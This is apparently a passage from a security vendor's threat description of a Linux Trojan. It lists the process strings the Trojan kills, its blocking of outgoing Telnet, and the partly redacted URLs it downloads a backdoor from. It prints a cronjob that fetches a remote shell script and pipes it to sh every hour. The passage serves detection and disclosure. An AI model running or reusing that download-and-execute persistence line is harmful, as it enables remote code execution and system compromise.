Process Termination
This Trojan terminates processes or services that contain any of the following strings if found running in the affected system's memory:
- config.json -t
- ynn
- xmr
- wc.conf
- wq.conf
- wm.conf
- wt.conf
- ppl
- pscf
- ppc
- ppp
Other Details
This Trojan does the following:
- It blocks outgoing Telnet connections on the following ports:
- 23
- 2323
- It creates the following cronjob to download and execute 2.sh every 1 hour:
- * 1 * * * $LDR http://{BLOCKED}.{BLOCKED}.39.78/2.sh | sh > /dev/null 2>&1
- wget -q -O -
- curl
- It connects to the following URL to download a file:
- http://{BLOCKED}.{BLOCKED}.39.78/4.sh
- http://{BLOCKED}.{BLOCKED}.39.78/re.php
- http://{BLOCKED}.{BLOCKED}.39.78/dog2.6
It saves the file using the following name:- $DIR/dog2.6 - detected as Backdoor.Linux.AESDDOS.J
- /tmp/{random temp name}/tmp
- /var/tmp
